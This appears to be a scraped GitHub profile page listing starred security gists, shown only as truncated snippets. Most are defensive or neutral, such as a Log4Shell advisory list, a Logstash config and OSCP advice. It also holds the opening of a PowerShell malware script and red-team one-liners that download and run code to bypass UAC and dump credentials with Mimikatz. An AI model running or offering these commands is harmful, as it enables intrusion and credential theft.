Skip to content

Instantly share code, notes, and snippets.

View kevXZY's full-sized avatar
Working from home

Kevin kevXZY

Working from home
  • Paris
View GitHub Profile
infernoboy / danger.ps1
Created April 8, 2022 23:39
This script was found in a malicious file not being detected by any AV as reported by virustotal
$scriptItem = Get-Item -Path $MyInvocation.MyCommand.Path;
$OS_Major = [System.Environment]::OSVersion.Version.Major.ToString() + "." + [System.Environment]::OSVersion.Version.Minor.ToString();
$EndPointURL = "";
$__Version__ = "M_37";
[string]$WorkerEnHandle = [Guid]::NewGuid().ToString();
[System.Threading.EventWaitHandle]$WorkerEn = [System.Threading.EventWaitHandle]::new($true, [System.Threading.EventResetMode]::ManualReset, $WorkerEnHandle);
function XF3a8JO3r5r8G([string] $str) {
return [System.Environment]::ExpandEnvironmentVariables("%" + $str + "%")
SwitHak /
Last active September 9, 2024 14:28
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
Internet health:
General technology and security trends:
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
linuxmalaysia / logstash-windows-events.txt
Last active March 15, 2024 13:51
logstash windows events from winlogbeat. Translate common Event ID's and Translate common Event ID's to Quadrants
input {
beats {
id => "01-beats-input"
port => 55044
tags => "winlogbeat"
vortexau / decompress.ps1
Last active May 13, 2024 07:53
Powershell to decompress DEFLATE data
$base64data = "insert compressed and base64 data here"
$data = [System.Convert]::FromBase64String($base64data)
$ms = New-Object System.IO.MemoryStream
$ms.Write($data, 0, $data.Length)
$ms.Seek(0,0) | Out-Null
$sr = New-Object System.IO.StreamReader(New-Object System.IO.Compression.DeflateStream($ms, [System.IO.Compression.CompressionMode]::Decompress))
while ($line = $sr.ReadLine()) {
mubix /
Last active August 30, 2024 19:42
How to start in Infosec

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it


Unicornscans in cli, nmap in msfconsole to help store loot in database.

HarmJ0y /
Created June 30, 2016 06:02
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
# Python port of keepass2john from the John the Ripper suite (
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
# source keepass2john.c source code from:
# Python port by @harmj0y, GNU General Public License